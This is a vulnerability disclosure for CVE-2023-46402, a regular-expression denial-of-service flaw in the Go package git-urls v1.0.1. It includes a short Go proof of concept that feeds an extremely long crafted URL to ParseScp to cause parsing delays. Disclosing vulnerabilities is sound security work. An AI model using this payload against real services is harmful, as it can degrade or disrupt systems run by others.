Headline
CVE-2023-46402: Security issue in regex inside git-urls package
git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.
[NAME OF AFFECTED PRODUCT(S)]
- https://pkg.go.dev/github.com/whilp/git-urls v1.0.1
[AFFECTED AND/OR FIXED VERSION(S)]
- v1.0.1
- Status: not fixed
[VULNERABILITY]
- Regex Denial of Service
[DESCRIPTION]
The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside
directory path of the git url.
It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:
var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := “6en6ar@-:0////” + payload + “\”
begin := time.Now()
//u, err := giturls.ParseScp(“[email protected]:/remote/directory”)// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
}
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)
This vulnerbale regex causes the application to take longer time in parsing the input.
Related news
git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.